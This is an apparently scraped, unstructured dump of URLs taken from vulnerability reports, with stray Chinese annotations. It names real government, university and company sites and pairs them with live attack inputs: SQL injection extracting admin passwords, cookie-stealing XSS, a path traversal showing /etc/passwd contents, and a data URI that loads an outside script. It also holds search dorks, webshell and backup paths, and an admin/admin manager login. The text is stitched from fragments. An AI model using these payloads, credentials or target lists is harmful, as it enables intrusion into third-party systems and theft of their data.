http://music.google.cn/search?newwindow=1&site=webhp&q=inurl%3Afuwu_list.asp%3Fid&btnG=Google+%E6%90%9C%E7%B4%A2 http://www.sxhdct.com/fuwu_list.asp?id=65 http://www.shanghaizhongmin.com/news_list.asp?id=58 http://www.dgsytz.com/fuwu_list.asp?id=55 http://www.whjcrh.com/fuwu_list.asp?id=56 http://www.sywssp.com/news_list.asp?id=54 http://www.sz-zdy.com/news_list.asp?id=57 http://www.njxietong.com/news_list.asp?id=59 http://www.ahxyqz.com/news_list.asp?id=66 http://www.jxrsq.com/news_list.asp?id=55 http://www.fjbjxy.com/news_list.asp?id=74 http://www.fjbjxy.com/news_list.asp?id=74 http://www.sdkunde.com/fuwu_list.asp?id=64 http://www.fs-guancheng.com/fuwu_list.asp?id=55 http://www.nbtfyy.com/fuwu_list.asp?id=59 http://www.sdbrg.com/fuwu_list.asp?id=69 http://www.slcxkj.com/fuwu_list.asp?id=59 http://www.cqydfl.net/rc_list.asp?id=4 http://www.tianyuemotor.com/news_list.asp?id=68 
http://www.jinfenganxin.com/news_list.asp?id=74 http://www.bjfxnt.com/news_list.asp?id=57 http://www.jstzjf.com/news_list.asp?id=32 http://www.jymyms.com/news_list.asp?id=57 http://www.szhmsl.com/news_list.asp?id=58 http://www.jjhainiu.com/news_list.asp?id=57 http://www.dgytblg.com/news_list.asp?id=73 http://www.chuduhengkang.com/news_list.asp?id=32 http://www.zhonghuajiaji.com/new_list.asp?id=54 http://www.fjtlly.com/news_list.asp?id=73 http://www.jshdhn.com/news_list.asp?id=74 http://www.zzxyy8.com/news_list.asp?id=74 http://www.wandashiyou.com/news_list.asp?id=99 http://www.tjhrl.com/news_list.asp?id=69 http://www.scysjs.com/news_list.asp?id=32 http://www.shxzbz.com/news_list.asp?id=70 http://www.szhdmc.com/news_list.asp?id=55 http://www.szcszlkt.com/news_list.asp?id=55 http://jjytrade.com/news_list.asp?id=72 http://www.jyhongfa.com/news_list.asp?id=69 http://www.nckcxx.com/new_list.asp?id=86 http://www.yyjszj.com/fuwu_list.asp?id=66 http://vip.stock.finance.sina.com.cn/q/view/hk_economic_data.php?&type=jlxfwjzs http://vip.stock.finance.sina.com.cn/q/view/hk_economic_data.php?&type=jlxfwjzs http://stock.finance.sina.com.cn/manager/api/jsonp.json/var%20p100025=/FundManagerService.getMoneyHistoryNav?symbol=100025&begin=20130825&end=20140909&_=9 http://localhost/index.php?do=user http://localhost/index.php?do=seller&id=5529 http://localhost/index.php?do=pubgoods http://localhost/admin/index.php?do=user&view=charge&valid=1&maxCash=100&maxCredit=&user=5529&cash_type=1&cash=100&charge_reason=&is_submit=1 http://gcloudtest.gac-toyota.com.cn:8005/Default1.aspx http://www.itscholar.com/ http://www.itscholar.com/itsviewtopic.php?f=21&t=1722 http://housing.jinti.com/aspx/aspx/GetManageURL.aspx?act=stop&ID=29504324&areaid=439&depareaid=826&spotareaid=1440&category=159&reurl=http%3a%2f%2fhousing.jinti.com%2faspx%2faspx%2fPerson_my_posts_all.aspx http://housing.jinti.com/shanghai-changfangchuzu/d32062188.htm http://tz.xmchengdu.gov.cn/Zftz/NewWeb/NewsDetail.aspx?itemID=000147 
http://www.viewgood.com/ http://demounicom.viewgood.com/SPM/pc/themes/default/default.aspx http://www.youhui6.com/shop/product!index.action网站, http://t.vic.sina.com.cn/201309nba/forum/fans/rank_list?forum_id=17&order_field=post_num&order_type=DESC&page_no=3 http://zz.speiyou.com/search/index http://zz.speiyou.com/search/index/grade:ff808081427f932601428f4484932916/subject:/level:bx/term:/gtype:tea http://zz.speiyou.com/search/index/grade:ff808081427f932601428f4484932916/subject:/level:bx/term:/gtype:tea http://aigu.stcn.com/pay.action sh.118100.cn/present/user/useraction!weblogin.action http://hbdjfy.gov.cn/index.php?act=about&id=40 http://www.ahwlh.com/index.php?act=about&id=42 http://www.hbsjsbyy.com/index.php?act=about&id=7 http://www.huaibeiyuxin.com/index.php?act=about&id=7 http://www.zhongkangyuan.net/index.php?act=about&id=7 http://www.ahhzjt.com/index.php?act=about&id=22 http://www.jinsexitang.com/index.php?act=about&id=28 http://www.hbsxmsysc.cn/index.php?act=news&id=22 http://www.sxbjamxh.com/index.php?act=news&id=24 http://www.ylscgyg.com/index.php?act=about&id=44 http://www.hbdonjin.com/index.php?act=about&id=44 http://rd.lieshan.gov.cn/index.php?act=about&id=55 http://ahjjmp.l34.goodnic.net/index.php?act=about&id=45 http://www.hbygjd.cn/index.php?act=about&id=42 http://www.hbzdct.com/index.php?act=about&id=36 http://jifen.jiajiaoban.com/ http://jifen.jiajiaoban.com/students/notice/41 http://www.flyhigh.com.cn/admin.php http://www.flyhigh.com.cn/?ac=content&id= http://www.flyhigh.com.cn/shell.php http://www.591sq.com/daka/daka.jsp; www.vindapaper.com/vindapaper.zip http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=user&act=register http://sj.com/1.swf http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=user&act=register http://www.zhongchou.cn/user-modifypassword www.zhongchou.cn http://www.zhongchou.cn http://learning.bankofshanghai.com/jmx-console/ http://61.50.254.192/Login.action http://210.51.167.63/ 
http://admin.ifttt.gfan.com/ http://admin.ifttt.gfan.com/phpinfo.php http://admin.ifttt.gfan.com/backup.zip http://admin.ifttt.gfan.com/lib/config.php IP:220.181.150.247:443 http://www.foyoedu.com/) http://www.tcedu.com.cn/module/sitesearch/index.jsp?columnid=120 file://y http://xxx.xxxx.cn inurl:/Docs/Commentlist.aspx?ItemID= http://ndxbskb.imu.edu.cn/mwb/Docs/Commentlist.aspx?ItemID=22 http://www.sqlmap.org http://support1.lenovo.com.cn/lenovo/wsi/station/servicestation/Api/QueryMap.ashx?area=022&type=%E5%8F%B0%E5%BC%8F&stationId= http://telhosting.xinnet.com/ http://drops.wooyun.org/tips/409 http://118.144.75.80:8081/web/index?language=cn inurl:edoas2/,或inurl:edoas/ http://temai.baidu.com/SearchIndex/Index?wd=%22%20onmousemove=alert%281%29%20a=%22&from=searchinput http://www.tclbattery.com/help.php http://battery.tcl.com/help.php http://www.tclbattery.com/php.php http://evod.zjtcm.net/ FwVer:3.11.2.176_TC3086 HwVer:T14.F7_6.0 http://www.shodanhq.com/search?q=TD-8820 http://地址/rom-0 http://222.240.26.10/ http://124.135.20.122/rom-0 http://wap.baidu.com/error.jsp?bd_page_type=1ceqre%22%3E%3Cimg%20src=%22x%22%20onerror=%22alert%28document.cookie%29%22%3Ewre%3Ca%20href=%22 http://bbs.jjwxc.net/board.php?board=43&subid=0&type= http://210.21.59.57:99/test/kq.mdb http://addon.discuz.com/?@mpage_sign.plugin dps_sign:sign http://magazine.tcl.com/info.aspx http://download.ime.sogou.com/1409918988/sogou_pinyin_72k.exe?st=VF2xLEaDa6Xb3rKzoLo7Pg&e=1410411894&fn=sogou_pinyin_72k.exe http://ecard.gdqy.edu.cn/indexmanagerLogin.action http://ykt.hebut.edu.cn/indexmanagerLogin.action http://kwzx.hrbcu.edu.cn/indexmanagerLogin.action http://ecar.hrbust.edu.cn/indexmanagerLogin.action http://ecard.jxust.cn/indexmanagerLogin.action http://yktcx.njmu.edu.cn/indexmanagerLogin.action http://ecard.qau.edu.cn/indexmanagerLogin.action http://ecard.shjgxy.net/indexmanagerLogin.action http://yktcx.tjut.edu.cn/indexmanagerLogin.action http://ecard.tust.edu.cn/indexmanagerLogin.action 
http://ecard.tyut.edu.cn/indexmanagerLogin.action http://ecard.utsz.edu.cn/indexmanagerLogin.action http://finance.unisk.com.cn/ http://202.100.252.120:8080/ http://wooyun.org/bugs/wooyun-2010-064440 http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://210.36.80.99/pks/pksdj.aspx?xxid=50870 http://210.36.80.99/pks/pksdj.aspx?xxid=50870 http://www.pishu.com.cn/skwx_ps/initDatabaseDetail?siteId=14&contentId=1816755&contentType=literature http://www.pishu.com.cn/skwx_ps/multimedia/download?ID=2217777&siteid=14&Type=literature http://www.nenu.edu.cn/professor/pro/yul/c_jbxx_new.php?id=1112 http://szjbh.szcw.cn/contact.php?id=235 http://oyxtl.szcw.cn/contact.php?id=359 http://szhl.szcw.cn/contact.php?id=256 http://szhdskd.szcw.cn/contact.php?id=83 http://szhmdz.szcw.cn/contact.php?id=304 http://wjdr.wj.szcw.cn/contact.php?id=288 http://active.szcw.cn/bmpost/form.asp?infoid=328 http://58.213.147.236:8080/admin/admin_login.asp http://58.213.147.236:8080/admin/ImageNews/2013913105324948.asa http://58.213.147.236:8080/admin/ImageNews/xx.asp http://58.213.147.236:8080/admin/ImageNews/20135232134465.asp http://www.dafeng.js.cn/)的主页面上有两个后台管理系统:人大议案建议办理系统和政协提案办理系统 http://cqb.wuxi.gov.cn)多个后台管理系统登陆密码处存在SQL注入 http://youth.whut.edu.cn/wwwroot.rar http://club.show.sina.com.cn/uc_server/ http://58.22.154.146:15693/ http://58.22.154.146:15693/gsm/qq_1.asp?Submit=%C3%88%C2%B7%C2%B6%C2%A8&user=1 http://58.22.154.146:15693/gsm/qq_1.asp?user=1就是注入点 http://tryw.henu.edu.cn/ketizu.asp?ktzid=1 http://eme.meteni.com/UserCenter/EditSign.aspx)未过滤输入内容,导致可以直接插入js代码并在个人信息页面被加载执行; http://eme.meteni.com/Vip/TopicCoursesEdit.aspx?Id=xxxx)未对上传课程资料类型进行限制,可直接上传asp、aspx脚本并执行; 
http://222.240.131.189:10080/toLoginPage.do http://113.57.132.2:83 http://113.57.132.2:83/alert.txt http://wap.gouwu.sogou.com/search#shop/query=%3Cscript%3Ex%3Ddocument.cookie%3Balert%28x%29%3B%3C%2Fscript%3E&sourceid=si_tbtn&ie=utf-8 http://地址/tmp/3200-config.bin http://218.25.78.243/tmp/3200-config.bin http://www.baidu.com data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL2prZ2gwMDYuYnlldGhvc3QxNy5jb20vdF94LmpzID48L3NjcmlwdD4= http://www.zhihuihb.net/ http://www.haierdianzi.com/huaxiaadmin/ http://www.kitchenhaier.com/huaxiaadmin/ http://www.purcotton.com/mall/mianroujin/vote.ihtml http://res.purcotton.com/mres/res/mall/js/member/vote.js http://www.purcotton.com/mall/zixunvote/getVoteNum.ihtml num:116 num:116},确认可以注入。 http://www.aa.gov.cn/System/sys0_inc_voteresult.asp?VoteID=1 http://202.197.120.18/st10542/business/login.jsp http://wygs.nbu.edu.cn/Bbsshow.asp?ID=6 http://www.zzxingce.com/admin/ http://loupan.house.yzdsb.com.cn/?a=search&f=&s=&p=&e=&t=&r=&h=&d=&w= http://ka.2366.com/cardlist_1.php?gid=4340&rcname=%E4%BC%9A%E5%A5%BD%E7%8E%A9 http://ka.2366.com/cardlist_1.php?gid=4340&rcname=%E4%BC%9A%E5%A5%BD%E7%8E%A9 http://q.k189.cn/activity/Llqqb/index/loginAction.xml http://q.k189.cn/activity/Llqqb/index/loginAction.xml http://youth.whut.edu.cn/Admin_Youth/Login.aspx http://gaj.laixi.gov.cn/clist.jsp?id=7516 http://gaj.laixi.gov.cn/list.jsp?id=6715 http://jiaotong.laixi.gov.cn/list.jsp?id=6737 http://jiaotong.laixi.gov.cn/clist.jsp?id=7603 http://xmj.laixi.gov.cn/list.jsp?id=7287 http://kjj.laixi.gov.cn/list.jsp?id=6671 http://jgswgl.laixi.gov.cn/clist.jsp?id=7592 http://jgswgl.laixi.gov.cn/list.jsp?id=7039 http://career.sdju.edu.cn/dianjiweb/conformid.asp?Tid=e http://app.qiushibaike.com:3000 http://dg.uninx.com:8481/dgpt/endpage.php?gid=87&shopid=4 http://dg.uninx.com/dgpt/endpage.php?gid=183&shopid=5 www.ssap.com.cn/ceshi.rar www.ssap.com.cn/admin.rar http://test.ssap.com.cn/admin/ http://baike.ssap.com.cn 
http://music.google.cn/search?q=inurl:managerOneGgxxfb.action&newwindow=1&site=webhp&ei=u5ERVI_ULJfm8AX8v4CQDQ&start=40&sa=N http://ecard.sjtu.edu.cn/homeLogin.action http://ecard.sdu.edu.cn/homeLogin.action http://ecard.utsz.edu.cn/homeLogin.action http://card.tjfsu.edu.cn/homeLogin.action http://ecard.tust.edu.cn/homeLogin.action http://www.ykt.sdnu.edu.cn/homeLogin.action http://xyk.jlnu.edu.cn/homeLogin.action http://www.ecard.ldu.edu.cn/homeLogin.action http://ecard.scau.edu.cn/homeLogin.action http://www.ecard.sdwu.edu.cn/homeLogin.action http://id.gzu.edu.cn/homeLogin.action http://ecard.jxust.cn/homeLogin.action http://211.64.8.8/homeLogin.action http://cco.tjufe.edu.cn/homeLogin.action http://ykt.hzau.edu.cn/homeLogin.action http://ykt.hebut.edu.cn/homeLogin.action http://yktcx.njmu.edu.cn/homeLogin.action http://ecard.ctbu.edu.cn/homeLogin.action http://ecard.hycollege.net/homeLogin.action http://www.kuaidin.com/homeLogin.action http://card.dgpt.edu.cn/homeLogin.action http://kwzx.hbue.edu.cn/homeLogin.action http://ecard.tyut.edu.cn/homeLogin.action http://ecard.ouc.edu.cn/homeLogin.action http://card1.upc.edu.cn/homeLogin.action http://www.nnfwwb.gov.cn/ http://srdp.ouc.edu.cn/fckeditor/_samples/default.html http://test.ssap.com.cn/ http://test.ssap.com.cn/api/ http://www.ssap.com.cn http://www.ssap.com.cn/member/OrderAddress.ashx?type=0&Code=120000 http://www.hxjjjc.gov.cn/article.php?MsgId=70313 http://www.hxjjjc.gov.cn/summaryarticle.php?MsgId=44820 http://www.ahjjjc.gov.cn/summaryarticle.php?MsgId=44820 http://www.whjjw.gov.cn/summaryarticle.php?MsgId=44820 http://www.hnsjw.cn/summaryarticle.php?MsgId=44820 http://www.szsjw.gov.cn/summaryarticle.php?MsgId=44820 http://www.dsjjjc.gov.cn/summaryarticle.php?MsgId=44820 http://www.aqtcjjjc.gov.cn/summaryarticle.php?MsgId=60321 http://www.whjjw.gov.cn/summaryarticle.php?MsgI http://admin.zdnet.com.cn/global_check/check.php?act=check&key=G61Pb0dPZZbHKePl7Xzw http://www.trip8080.com/ask/ 
http://www.loufeng.gov.cn/xinwen.php?tid=1 http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/IO.XSRV2.CallbackList['6kMjVzyfUpC0wo3L']/NetValue_Service.getNetValueOpen?page=1&num=40&sort=nav_date&asc=0&ccode=80000222&type2=0&type3= http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/IO.XSRV2.CallbackList['6kMjVzyfUpC0wo3L']/NetValue_Service.getNetValueOpen?page=1&num=40&sort=nav_date&asc=0&ccode=80000222 http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/IO.XSRV2.CallbackList['6kMjVzyfUpC0wo3L']/NetValue_Service.getNetValueOpen?page=1&num=40&sort=nav_date&asc=0&ccode=80000222 http://jiudian.trip8080.com/orderSubmit.jspx?callback=jsonp1410511463418&hid=7284&rid=73079&pid=50042&cid=33&rm=1&tm1=2014-09-14&tm2=2014-09-16&guest=%2525E5%2525BC%2525A0%2525E8%25258C%2525AB%2525E8%25258C%2525AB&mobile=13047661205&roomPrice=270&userEmail=&latetime=06%3A00&keepTime=23%3A59-06%3A00&totalPrice=0 http://zone.wooyun.org/content/744 http://zone.wooyun.org/content/744的一个实例测试。感谢大神们分享技术 http://127.0.0.1/ecshop2.7.4/csrf.js http://127.0.0.1/ecshop2.7.4/csrf.js http://127.0.0.1/ecshop2.7.4/admin/sql.php http://221.204.12.39/ http://www.tfxfdc.com/pubinfo/Moreysxk.asp?Qryqyxmbm=DBDHDADCDADADADJDDDBDCDF000002 http://www.hsfdc.com/web/PubInfo/Moreysxk.asp?Qryqyxmbm=DBDHDADCDADADADBDDDBDCDD000001 http://www.rich-healthcare.com/admin/index.aspx存在弱口令admin/admin http://121.14.4.151:81/toIcp.action GOOGLE:inurl:opac_two http://211.68.68.197/opac_two/mylibrary/comment/queryAllComment.action http://219.218.26.4:85//opac_two/mylibrary/comment/queryAllComment.action http://218.107.150.8/opac_two/mylibrary/comment/queryAllComment.action http://219.242.31.130:8080//opac_two/mylibrary/comment/queryAllComment.action http://202.118.84.134:8080//opac_two/mylibrary/comment/queryAllComment.action http://202.205.160.120:8080//opac_two/mylibrary/comment/queryAllComment.action http://opac.lnu.edu.cn//opac_two/mylibrary/comment/queryAllComment.action 
http://202.197.224.89:8088//opac_two/mylibrary/comment/queryAllComment.action http://202.118.8.2:8080//opac_two/mylibrary/comment/queryAllComment.action http://210.77.83.73:8080//opac_two/mylibrary/comment/queryAllComment.action http://202.204.234.3:100//opac_two/mylibrary/comment/queryAllComment.action http://kaitong.cafa.com.cn:8080/opac_two/mylibrary/comment/queryAllComment.action http://lib.fjjxxy.cn:8080/opac_two/mylibrary/comment/queryAllComment.action http://202.4.153.19:8080/opac_two/mylibrary/comment/queryAllComment.action http://219.218.26.4:85//opac_two/mylibrary/comment/queryAllComment.action http://222.29.99.40:8080//opac_two/mylibrary/comment/queryAllComment.action http://www.baidu.com/s?wd=%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89%28C%29%09%09%E8%B5%9B%E9%A3%9E%E8%BD%AF%E4%BB%B6%20SINCE%201998&pn=60&oq=%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89%28C%29%09%09%E8%B5%9B%E9%A3%9E%E8%BD%AF%E4%BB%B6%20SINCE%201998&ie=utf-8 http://www.slssoft.com/Web/Index/WebDetail/ServiceGuide http://sps.isoffice.cn/ http://www.slssoft.com/Web/Index/WebDetail/customer http://sps.isoffice.cn/ http://www.epaylinks.cn/www/index.jsp http://www.epaylinks.cn/jmx-console/会出现错误信息, http://sh.passport.189.cn/ http://125.88.254.131:8080/nms/login.do http://www.luolong.gov.cn/wms/vote/vote_view.php?id=4 http://www.wsjhszx.org.cn/admin-wsj-w/FCKhtml/editor/filemanager/connectors/asp/conn.asp http://www.slssoft.com/ http://baike.baidu.com/view/5222614.htm?fr=aladdin http://oa.isoffice.cn/ http://www.slssoft.com/Web/Index/WebDetail/customer http://oa.isoffice.cn/StudyInfo/PersionInfoList.aspx http://oa.isoffice.cn/Project/ProjectType.aspx?CName=C&Title=%CE%EF%D7%CA%C0%E0%B1%F0&TableName=MaterialInfo http://baby.maimiaojie.com:8080/mysql/add_user.php http://nx.bbn.com.cn/biz/czcp.php?biz_id=436&tag=1&p_id=3216 http://nx.bbn.com.cn/lgy_nzdj/index2.php?member_id=19399&ID=2149 http://www.qidian.com.tw/ http://www.qidian.com.tw/members/sithle http://locate.189.cn/ http://locate.189.cn:7070/site/register 
http://218.104.188.186/ http://218.104.188.186/wuyun.asp;.txt www.taikr.com www.osforce.cn www.chinahadoop.cn http://yun.itxdl.cn http://www.lampym.com http://www.meiyeedu.com http://www.17xueit.com/ http://www.yova.org/ http://222.143.53.1/login.jsp http://www.jd.com/pinpai/authcode.php?returnUrl=http%3A%2F%2Fwww.jd.com%2F search.360buy.com/core/XTest.php http://222.178.221.54:7001/defaultroot/InfoViewIframeAction.do?historyId=1&action=delHistory http://119.254.81.197:7001 http://61.191.17.216:7001 http://219.136.247.248:7001 http://222.178.221.54:7001 http://222.178.221.54:7001/defaultroot/public/edit/admin/login.jsp http://oa.hongdou.com:7001/defaultroot/public/edit/admin/default.jsp http://oa.jiuhuashan.cc:7001/defaultroot/public/edit/admin/default.jsp http://www.portever.com:7001/defaultroot/public/edit/admin/default.jsp http://203.95.5.90:7001/defaultroot/public/edit/admin/default.jsp http://222.178.221.54:7001/defaultroot/GovDocumentDossierAction.do?id=1&flag=sendFile http://119.254.81.197:7001 http://61.191.17.216:7001 http://219.136.247.248:7001/ http://222.178.221.54:7001 http://sme.swjtu.edu.cn/newsDetail.aspx?id=554 http://tuan.aili.com/wap/myaddress.php页面 http://tuan.aili.com/wap/ajax.php http://zcc.hunnu.edu.cn/CG_Content.aspx?id=1053&type=70 http://www.peiluyou.com:9999/isxunleiluyou?_act_=getRouterSetting&pdtid=3&routerId=&t=1410605628390 http://www.peiluyou.com:9999/getstatus?statusId=40&_act_=getWifi&pdtid=3&routerId=XXXXXXXX&uid=XXXX(迅雷UID)&t=1410605877578 http://www.peiluyou.com:9999/getconnectionsettings?_act_=getConnectionSettings&pdtid=3&routerId=XXXXXXXX&uid=XXXX(迅雷UID)&t=1410605870515 http://dynamic.i.xunlei.com/user)。怎么找到UID不在我说明范围,但是可以肯定的有地方肯定可以查到。 http://wooyun.org/bugs/wooyun-2014-064004 http://school.xrui.net/view.php?id=1665 http://222.178.221.54:7001/defaultroot/DossierBorrowAction.do?record=1&action=load” http://119.254.81.197:7001 http://61.191.17.216:7001 http://219.136.247.248:7001 http://222.178.221.54:7001 
http://m.antakids.com//1.php/ http://m.antakids.com/test/z1.html http://m.antakids.com/test/index.html http://market2.yesky.com/currentplay/view/template/images/51279269289.jsp?o=vLogin http://work.ch.gongchang.com/product/new/post inurl:index_gangwei_x_x.php url:http://211.154.133.111:8888/manager/html user:admin pass:admin http://www.huizhongcf.com/ www.huizhongcf.com http://js.t.sinajs.cn/t5/webim/swf/sync_storage.swf,该文件的addcallback添加的函数接口的返回值未经过滤,然后allowDomain允许一些白名单内的域名 site:com/jap.php site:gov.cn/jap.php http://www.ncct.gov.cn/ http://www.dyzjj.gov.cn/ http://www.lygtzyj.gov.cn/ http://www.dhhrss.gov.cn http://www.jfsly.gov.cn http://ncgyy.gov.cn/ http://www.lahrss.gov.cn/ http://www.weihailinye.gov.cn/ http://www.lsrs.gov.cn/index.html http://www.jlxrd.gov.cn/ http://person.amac.org.cn/pracnew/ http://cwcx.xtu.edu.cn:8004/grsr/Login.asp http://180.153.25.224/WeixinManagerWEB/Account/Login.aspx http://misc.360buyimg.com/purchase/swf/flashcookie.swf lines:301-324) http://sme.ujs.edu.cn//plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://www.jiathis.com/code/swf/m.swf http://souke.jiajiaoban.com/ http://souke.jiajiaoban.com/searchs/search/tuiguang:/kemu:/nianji:/xuequ:/teachername:1/sex:/status inurl:searchs/search/tuiguang http://souke.jiajiaoban.com/searchs/search/tuiguang:/kemu:/nianji:/xuequ:/teachername:1/sex:/status http://souke.jiajiaoban.com/searchs/search/tuiguang:/kemu:/nianji:/xuequ:/teachername:1*/sex:/status http://souke.jiajiaoban.com:80/searchs/search/tuiguang:/kemu:/nianji:/xuequ:/teachername:1% sex:/status http://www.timber2005.com/Product_sy.html http://exam1.timber2005.com/login.aspx http://exam1.timber2005.com/system/system_config.aspx 
http://zx.gzzkzsw.com/UpLoad/System/20140914164100746093.aspx http://cellphoneversionrouter.unicompayment.com:55351/payfront_vercontrol/verControl.action http://kczx.gzhu.edu.cn/course_center/index/ inurl:course_center/index http://www.elut.cn/works.html http://www.sunrisingbelt.com/about.asp?keyno=437 http://www.jayee-fitting.com/about.asp?keyno=454 http://www.hnttex.com/about.asp?keyno=481 http://www.dgzhuoshun.com/about.asp?keyno=481 http://www.kleansource.com/about.asp?keyno=481 http://www.lonova-ele.com/about.asp?keyno=481 http://www.wisevigor.com/about.asp?keyno=481 http://www.easymechem.com/about.asp?keyno=481 http://www.printingbetter.com/about.asp?keyno=481 http://www.u-win.hk/about.asp?keyno=454 http://www.uniquelock.cn/about.asp?keyno=437 http://www.todobelt.com/about.asp?keyno=611 http://www.dongqianlake-packaging.com/about.asp?keyno=481 http://www.jgsanitaryware.com/about.asp?keyno=481 http://www.houseleadercorp.com/about.asp?keyno=453 http://www.fashion-accessories.com.cn/about.asp?keyno=481 http://www.cnwoodytoys.com/about.asp?keyno=481 http://www.ashine-tech.com/about.asp?keyno=437 http://www.hxibearing.com/about.asp?keyno=481 http://www.chuangguan.net/about.asp?keyno=481 http://www.atrunk.com/about.asp?keyno=481 http://www.wintimes.net/about.asp?keyno=481 http://www.maytelecom.com/about.asp?keyno=481 http://www.mlecobag.com/about.asp?keyno=481 http://www.chengyitex.com/about.asp?keyno=481 http://www.berhon.com/about.asp?keyno=481 http://tui8980-.rygit.com的钓鱼网站,如图6。 http://xgb.lzu.edu.cn/AdminLogin.aspx http://xb.xytc.edu.cn/bulletin/display_all/download.asp?code=20140508180449&sub_code=25 http://xb.xytc.edu.cn/systemmanager/login.asp http://59.73.148.27:8080/bj_client/InfoMastSelect.aspx?ID=275 http://211.64.123.12/bj_client/InfoMastSelect.aspx?ID=247 http://202.204.190.42/oa_client/InfoMastSelect.aspx?ID=352 http://vrs.lib.xju.edu.cn/oa_client/App_Pages/App_page/InfoMastSelect.aspx?id=115 http://lib.xjmu.edu.cn/oa_client/InfoMastSelect.aspx?ID=272 
http://lib.heuet.edu.cn:8080/oa_client/InfoMastSelect.aspx?ID=174 http://www.meilishuo.com/log.txt http://jw1.njau.edu.cn/reportFiles/cj/cj_zwcjd.jsp http://219.148.85.172:9080/reportFiles/cj/cj_zwcjd.jsp http://jwxt.sxau.edu.cn/reportFiles/cj/cj_zwcjd.jsp http://180.201.80.1/reportFiles/cj/cj_zwcjd.jsp http://www.fjnh.gov.cn/xxgk/xx_Search.asp?Unit_ID=15 http://www.dxwsj.gov.cn/show_news.asp?ID=3246 http://www.gzpf.gov.cn/pf/program/html/site_news_content.php?SiteID=1&ItemID=536042407&ID=903 http://www.jllh.gov.cn/el/dis_news.php?disis=202 http://www.ahcss.gov.cn/include/web_content.php?id=2061 http://www.systats.gov.cn/ndtjgb_page.php?xuh=1697 http://www.gz.stats.gov.cn/SurveyInfo/VotesTheme.aspx?id=1 http://www.longxi.gansu.gov.cn/showxw.asp?id=14040 http://www.snsanyuan.gov.cn/knry.jsp?urltype=news.NewsContentUrl&wbtreeid=1054&wbnewsid=29277 http://www.hljboli.gov.cn/mome.asp?id=1 http://www.ssap.com.cn/SKWX/Job_list.aspx?type=1 http://pay.mobile.sina.cn/nc/third_pay/third_pay_alipay_get.php?mobile=&fee=3C8i9zDVchc%3D&business_id=309 http://jf.js118114.com/SearchList.aspx?sc=3000_5000 http://jf.js118114.com/SearchList.aspx?sc=3000_5000 http://ego10000.com/ajax_check_user.php?email= http://ce.wooyun.org/project/6 http://ce.wooyun.org/content/3432 http://ota.pay.mobile.sina.cn/platform/orderConfirm.php?sessionId=6756219&paymentTag=alipayAccount http://www.jljcxy.com/thirdparty/apprise/testdetail.jsp?s=%25E6%2595%2599%25E5%258A%25A1%25E5%25A4%2584 http://chinafoundation.org.cn/search?m=213&t=3 http://chinafoundation.org.cn/findxm?areaid=1 http://chinafoundation.org.cn/findxm http://chinafoundation.org.cn/readnb?jjhid=4028e5fe35c1cdd60135c1d441c95042&y=2011 http://chinafoundation.org.cn/search http://chinafoundation.org.cn/jrwm?id=256 http://chinafoundation.org.cn/foundationrecruitmentviewinfo?id=29072 http://chinafoundation.org.cn/jjhzp?a.wage=0 http://chinafoundation.org.cn/jjhzp?a.foreignLangauge=0 http://chinafoundation.org.cn/jjhzp?a.education=0 
http://chinafoundation.org.cn/jjhzp?a.workType=0 http://chinafoundation.org.cn/search?ztid=15509&m=3856&t=3 http://chinafoundation.org.cn/readxmrz?id=4028e5e5382864f001388ef105e20207 http://chinafoundation.org.cn/search?m=25181 http://chinafoundation.org.cn/jjhzp?a.type=0 http://chinafoundation.org.cn/readzt?id=15509 http://chinafoundation.org.cn/searchgdinfo?table=JJH_NJ_SITUATION&line=insConclusion http://chinafoundation.org.cn/readjjh?id=4028e5fe35c1cdd60135c1d441c95042 http://chinafoundation.org.cn/readnb?jjhid=4028e5fe35c1cdd60135c1d441c95042&y=2011 http://chinafoundation.org.cn/searchgdinfo?table=JJH_REGISTRATION http://chinafoundation.org.cn/search?jjhid=4028e5fe35c1cdd60135c1d441c95042&m=3720 http://chinafoundation.org.cn/ccms/search?m=213&t=3 http://chinafoundation.org.cn/ccms/findgov?sheng=1 http://chinafoundation.org.cn/ccms/findxm?areaid=1 http://chinafoundation.org.cn/ccms/jrwm?id=256 http://chinafoundation.org.cn/ccms/foundationrecruitmentviewinfo?id=29072 http://chinafoundation.org.cn/ccms/jjhzp?a.workAddress=1 http://chinafoundation.org.cn/ccms/jjhzp?a.foreignLangauge=0 http://chinafoundation.org.cn/ccms/jjhzp?a.workType=0 http://chinafoundation.org.cn/ccms/search?m=25181 http://chinafoundation.org.cn/ccms/readzt?id=15509 http://www.hulianpay.com/ www.sipmch.com.cn/yqyzfweb/consultant/gzjdmore.aspx http://mail.hunantv.com.cn http://wooyun.org/bugs/wooyun-2010-061894 http://mail.hunantv.com.cn/webmail/getPass.php?email=bianxingji@hunantv.com&update=s http://moon.bao.ac.cn/mission/post.jsp?cata=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00ce3topic&url=post002 lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh http://moon.bao.ac.cn/mission/post.jsp?cata=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts%00ce3topic&url=post002 
